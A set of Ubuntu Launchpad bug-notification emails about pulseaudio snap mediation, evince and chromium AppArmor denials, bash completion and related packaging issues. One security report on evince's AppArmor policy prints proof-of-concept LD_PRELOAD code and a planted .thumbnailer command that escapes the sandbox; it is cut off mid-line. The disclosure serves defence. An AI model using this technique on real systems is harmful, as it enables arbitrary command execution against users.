** Attachment added: "test-snapd-audio-record_1_amd64.snap" https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+attachment/5292539/+files/test-snapd-audio-record_1_amd64.snap -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record--
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
** Description changed: + + # Original summary: pulseaudio built with --enable-snappy but 'Enable + Snappy support: no' + + # Original description + From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes - - At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. + At this point, the patch should probably be dropped, otherwise + applications like chromium, etc will no longer be able to record. ** Summary changed: - pulseaudio built with --enable-snappy but 'Enable Snappy support: no' + please enable snap mediation support -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Bug description: # Original summary: pulseaudio built with --enable-snappy but 'Enable Snappy support: no' # Original description From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1834386] Re: Ebooks thumbnails fail in Nemo over SMB
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem- hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format This suggests that the problem is not due to the apparmor profile (it happens before the denial). Is the thumbnail correctly generated if you do: sudo apparmor_parser -R /etc/apparmor.d/usr.bin.evince (this unloads the policy from the kernel). ** Changed in: evince (Ubuntu) Status: New => Incomplete ** Tags added: apparmor -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1834386 Title: Ebooks thumbnails fail in Nemo over SMB Status in evince package in Ubuntu: Incomplete Bug description: Nemo is unable to generate ebooks thumbnails over SMB share because of evince-thumbnailer apparmor profile(note that Nautilus is able to do it anyway), i removed apparmor to see and it fixed that issue. Nemo output when generating thumbs: - (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format Error loading remote document: An AppArmor policy prevents this sender from sending this message to this recipient; type="method_call", sender=":1.243" (uid=1000 pid=1488 comm="evince-thumbnailer -s 128 smb://akem-hp.local/comi" label="/usr/bin/evince-thumbnailer (enforce)") interface="org.gtk.vfs.MountTracker" member="LookupMount" error name="(unset)" requested_reply="0" destination=":1.10" (uid=1000 pid=1725 comm="/usr/lib/gvfs/gvfsd " label="unconfined") (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.365: Unable to create loader for mime type application/x-cbr: Unrecognized image file format - Note that it does the same with pdf or some other ebooks format. The problem happens in loopback too, just share a folder with ebooks using SMB, flush the thumbnails and open Nemo to that folder via Network(connect to the SMB). ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evince 3.28.4-0ubuntu1.2 ProcVersionSignature: Ubuntu 4.18.0-22.23~18.04.1-generic 4.18.20 Uname: Linux 4.18.0-22-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Thu Jun 27 02:11:28 2019 InstallationDate: Installed on 2019-05-31 (26 days ago) InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210) SourcePackage: evince UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1834386/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1828275] Re: [snap] chromium generates a lot of Apparmor noise
You can 'sudo snap connect chromium:mount-observe' for /etc/fstab. /run/mount/utab is more complicated and you can read about it here: https://forum.snapcraft.io/t/namespace-awareness-of-run-mount-utab-and- libmount/5987 For the /run/udev/data accesses, can you paste the output of: $ cat /run/udev/data/b230\:* ** Package changed: chromium-browser (Ubuntu) => snapd (Ubuntu) ** Changed in: snapd (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1828275 Title: [snap] chromium generates a lot of Apparmor noise Status in snapd package in Ubuntu: Incomplete Bug description: Running Chromium's snap result in a lot of Apparmor noise like this: audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=0 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:0" pid=0 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 The above and the attached log was collected with: journalctl -o cat -k | grep -F ' apparmor="DENIED" ' | grep -F snap.chromium.chromium | sed 's/ audit([0-9.:]\+): / audit(0): /; s/ pid=[0-9]\+ / pid=0 /' | sort Additional information: $ snap info chromium name: chromium summary: Chromium web browser, open-source version of Chrome publisher: Canonical✓ contact: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bugs?field.tag=snap license: unset description: | An open-source browser project that aims to build a safer, faster, and more stable way for all Internet users to experience the web. commands: - chromium.chromedriver - chromium snap-id: XKEcBqPM06H1Z7zGOdG5fbICuf8NWK5R tracking: edge refresh-date: 11 days ago, at 12:08 EDT channels: stable:74.0.3729.131 2019-05-02 (705) 162MB - candidate: 74.0.3729.131 2019-05-01 (705) 162MB - beta: 74.0.3729.61 2019-04-06 (688) 162MB - edge: 75.0.3770.9 2019-04-27 (703) 163MB - installed: 75.0.3770.9 (703) 163MB - $ snap interfaces chromium SlotPlug :browser-supportchromium:browser-sandbox :camera chromium :desktopchromium :gsettings chromium :home chromium :networkchromium :network-bind chromium :opengl chromium :personal-files chromium:chromium-config :pulseaudio chromium :screen-inhibit-control chromium :u2f-deviceschromium :unity7 chromium :upower-observe chromium :x11chromium gtk-common-themes:gtk-3-themes chromium gtk-common-themes:icon-themes chromium gtk-common-themes:sound-themes chromium - chromium:cups-control - chromium:mount-observe - chromium:network-manager - chromium:password-manager-service - chromium:removable-media $ apt-cache policy snapd snapd: Installed: 2.38+18.04 Candidate: 2.38+18.04 Version table: *** 2.38+18.04 500 500 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.37.4+18.04.1 500 500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages 2.32.5+18.04 500 500 http://archive.ubuntu.com/ubuntu bionic/main amd64 Packages $ lsb_release -rd Description: Ubuntu 18.04.2 LTS Release: 18.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1828275/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1826415] Re: Videos do not play in presentation mode
** Tags removed: apparmor -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1826415 Title: Videos do not play in presentation mode Status in Evince: New Status in evince package in Ubuntu: Triaged Bug description: It is not possible to play embedded videos in the presentation mode. This affects PDF slides created with the beamer/multimedia latex package. Initially, no controls are shown on the slide with the video. In the normal mode, video controls appear when the video is clicked with the mouse. However, in the presentation mode, evince goes to the next page when one clicks with the mouse so that the controls do not appear and the video can only be played by exiting the presentation mode. Playing videos works fine in presentation mode with the okular PDF-viewer. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evince 3.28.4-0ubuntu1 Uname: Linux 4.15.0-041500rc6-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CurrentDesktop: GNOME Date: Thu Apr 25 16:15:43 2019 InstallationDate: Installed on 2015-11-05 (1267 days ago) InstallationMedia: Ubuntu 14.04.3 LTS "Trusty Tahr" - Beta amd64 (20150805) SourcePackage: evince UpgradeStatus: Upgraded to bionic on 2018-05-24 (335 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/evince/+bug/1826415/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not included in ESM. ** Changed in: evince (Ubuntu Trusty) Status: In Progress => Won't Fix -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1788929 Title: Debian/Ubuntu AppArmor policy gaps in evince Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in evince package in Ubuntu: Fix Released Status in apparmor source package in Trusty: Fix Released Status in evince source package in Trusty: Won't Fix Status in apparmor source package in Xenial: Fix Released Status in evince source package in Xenial: In Progress Status in apparmor source package in Bionic: Fix Released Status in evince source package in Bionic: In Progress Status in apparmor source package in Cosmic: Fix Released Status in evince source package in Cosmic: Fix Released Bug description: [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...] Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation: https://twitter.com/alex_murray/status/1032780425834446849 https://twitter.com/alex_murray/status/1032796879640190976 This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted: /usr/bin/evince-thumbnailer { [...] # Lenient, but remember we still have abstractions/private-files-strict in # effect). @{HOME}/ r, owner @{HOME}/** rw, owner /media/** rw, } As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc: [...] # don't allow reading/updating of run control files deny @{HOME}/.*rc mrk, audit deny @{HOME}/.*rc wl, # bash deny @{HOME}/.bash* mrk, audit deny @{HOME}/.bash* wl, deny @{HOME}/.inputrc mrk, audit deny @{HOME}/.inputrc wl, [...] Verification: user@ubuntu-18-04-vm:~$ cat preload2.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); int fd = open("/home/user/.bashrc", O_WRONLY); if (fd != -1) { printf("success\n"); } else { perror("open .bashrc"); } exit(0); } user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer constructor running from evince-thumbnailer open .bashrc: Permission denied user@ubuntu-18-04-vm:~$ dmesg|tail -n1 [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus. To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer: user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/ ls: cannot access '.local/share/thumbnailers/': No such file or directory user@ubuntu-18-04-vm:~$ cat preload3.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST) err(1, "mkdir"); FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w"); if (!f) err(1, "create"); fputs("[Thumbnailer Entry]\n", f); fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...] } As a comment in abstractions/dbus-session explains: # This abstraction grants full session bus access. Co
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
@Christina - I suggest filing a new bug with more specifics. That said, I suspect you have a .dpkg-dist file in /etc/apparmor.d or /etc/apparmor.d/abstractions that has changes that need to be merged into your evince profile. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Released Status in evince source package in Cosmic: Fix Released Status in evince source package in Disco: Fix Released Status in evince package in Debian: Fix Released Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1724793] Re: Error localization
** Package changed: ufw (Ubuntu) => language-selector (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to language-selector in Ubuntu. https://bugs.launchpad.net/bugs/1724793 Title: Error localization Status in language-selector package in Ubuntu: New Bug description: After some manipulation of the system interface of the OS was in English, as all the default startup application. I tried to change the locale via GUI, however, everything on the ground. --- После некоторых манипуляций с системой интерфейс ОС стал на английском, как и все запускаемые по умолчанию приложения. Пробовал изменить локаль через ГУИ, однако там всё на местах. locale LANG=ru_RU.UTF-8 LANGUAGE=C.UTF-8 LC_CTYPE="ru_RU.UTF-8" LC_NUMERIC="ru_RU.UTF-8" LC_TIME="ru_RU.UTF-8" LC_COLLATE="ru_RU.UTF-8" LC_MONETARY="ru_RU.UTF-8" LC_MESSAGES="ru_RU.UTF-8" LC_PAPER="ru_RU.UTF-8" LC_NAME="ru_RU.UTF-8" LC_ADDRESS="ru_RU.UTF-8" LC_TELEPHONE="ru_RU.UTF-8" LC_MEASUREMENT="ru_RU.UTF-8" LC_IDENTIFICATION="ru_RU.UTF-8" LC_ALL=ru_RU.UTF-8 locale -a C C.UTF-8 en_AG en_AG.utf8 en_AU.utf8 en_BW.utf8 en_CA.utf8 en_DK.utf8 en_GB.utf8 en_HK.utf8 en_IE.utf8 en_IN en_IN.utf8 en_NG en_NG.utf8 en_NZ.utf8 en_PH.utf8 en_SG.utf8 en_US.utf8 en_ZA.utf8 en_ZM en_ZM.utf8 en_ZW.utf8 POSIX ru_RU.utf8 ru_UA.utf8 cat /etc/default/locale # File generated by update-locale LANG="ru_RU.UTF-8" LANGUAGE="ru:en" LC_NUMERIC="ru_RU.UTF-8" LC_TIME="ru_RU.UTF-8" LC_MONETARY="ru_RU.UTF-8" LC_PAPER="ru_RU.UTF-8" LC_IDENTIFICATION="ru_RU.UTF-8" LC_NAME="ru_RU.UTF-8" LC_ADDRESS="ru_RU.UTF-8" LC_TELEPHONE="ru_RU.UTF-8" LC_MEASUREMENT="ru_RU.UTF-8" nano ~/.bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples #export LC_xxx=C.UTF-8 export LC_ALL=ru_RU.UTF-8 ... To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/language-selector/+bug/1724793/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1792835] Re: Bash completion for Inkscape does not work
The ufw bug is being tracking in bug 1775043. Removing that task. ** No longer affects: ufw (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to jackd2 in Ubuntu. https://bugs.launchpad.net/bugs/1792835 Title: Bash completion for Inkscape does not work Status in apt-xapian-index package in Ubuntu: New Status in cowdancer package in Ubuntu: Fix Committed Status in dpatch package in Ubuntu: New Status in inkscape package in Ubuntu: Fix Released Status in jackd2 package in Ubuntu: New Bug description: Bash completion for Inkscape does not work in Ubuntu 18.04. It will for example suggest non-svg files. The reason seems to be that /usr/share/bash- completion/completions/inkscape uses the have() function, which is temporarily defined in /usr/share/bash-completion/bash_completion, but then unset at the end of that file. Workaround: Copy /usr/share/bash-completion/completions/inkscape to ~/.local/share/bash-completion/completions/inkscape and remove the uses of "have". The bash completion for some other commands seem to use have() too, e.g. jackd, ufw, cowbuilder, dpatch_edit_patch, and axi-cache, so bash completion for these commands will presumably not work either. From /usr/share/bash-completion/bash_completion: - # Backwards compatibility for compat completions that use have(). # @deprecated should no longer be used; generally not needed with dynamically # loaded completions, and _have is suitable for runtime use. have() { unset -v have _have $1 && have=yes } [...] unset -f have unset have - From /usr/share/bash-completion/completions/inkscape: - [...] have inkscape && _inkscape() { [...] } [ "${have:-}" ] && complete -F _inkscape $filenames inkscape - System information: $ lsb_release -rd Description: Ubuntu 18.04.1 LTS Release: 18.04 $ apt-cache policy inkscape inkscape: Installed: 0.92.3-1 Candidate: 0.92.3-1 Version table: *** 0.92.3-1 500 500 http://no.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt-xapian-index/+bug/1792835/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1750069] Re: [MIR] xdg-desktop-portal-gtk
Marked the xenial and bionic tasks as incomplete. Seth gave some guidance but the desktop team needs to respond on how to handle it before anything is done with the seeding. ** Changed in: xdg-desktop-portal-gtk (Ubuntu Xenial) Status: New => Incomplete ** Changed in: xdg-desktop-portal-gtk (Ubuntu Bionic) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xdg-desktop-portal-gtk in Ubuntu. https://bugs.launchpad.net/bugs/1750069 Title: [MIR] xdg-desktop-portal-gtk Status in xdg-desktop-portal-gtk package in Ubuntu: Fix Released Status in xdg-desktop-portal-gtk source package in Xenial: Incomplete Status in xdg-desktop-portal-gtk source package in Bionic: Incomplete Bug description: Availability Actively maintained in debian and we'll sync from debian again when 0.10 is avaiable. Built for all supported architectures. Rationale = Required for snaps. Security No known security issues, but due to the nature of this package, a security review is probably needed. https://security-tracker.debian.org/tracker/source-package/xdg-desktop-portal-gtk https://launchpad.net/xdg-desktop-portal-gtk/+cve Quality assurance = - The Desktop Packages bug team is subscribed. https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=xdg-desktop-portal-gtk https://github.com/flatpak/xdg-desktop-portal-gtk/issues Dependencies No universe binary dependencies Standards compliance 4.1.3 debhelper compat 10, dh 7 style simple rules Maintenance === - Actively developed upstream. Last release was 0.10, this week. https://github.com/flatpak/xdg-desktop-portal-gtk/commits/master Well-maintained in Debian by Simon McVittie (Debian's Flatpak maintainer). Team-maintained. https://salsa.debian.org/debian/xdg-desktop-portal-gtk Background information == This is needed to make xdg-desktop-portal useful in Ubuntu Desktop. See xdg-desktop-portal MIR bug LP: #1749672 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk/+bug/1750069/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Actually, there is https://bugs.launchpad.net/bamf/+bug/1747802 which is fixed. I checked the code and this should be resolved. Marking as fixed. ** Changed in: bamf (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu. https://bugs.launchpad.net/bugs/1643910 Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7 Status in Snappy: Triaged Status in bamf package in Ubuntu: Fix Released Bug description: Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/ This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine. I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places: 1. when launching /snap/bin/... from the command line 2. when something in /var/lib/snapd/desktop/applications/*.desktop 